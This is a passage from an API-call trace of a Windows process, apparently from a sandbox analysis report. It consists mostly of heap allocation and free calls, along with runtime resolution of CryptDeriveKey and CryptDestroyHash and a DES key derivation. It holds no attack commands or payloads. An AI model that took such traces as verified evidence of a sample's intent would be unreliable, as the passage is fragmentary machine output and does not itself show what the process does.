Size=0x4) returned 0x2e54df8 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51358 [0246.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51358, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.299] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.300] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87510) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0246.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.305] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699c8 [0246.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0246.305] CryptDestroyHash (hHash=0xa87110) returned 1 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: 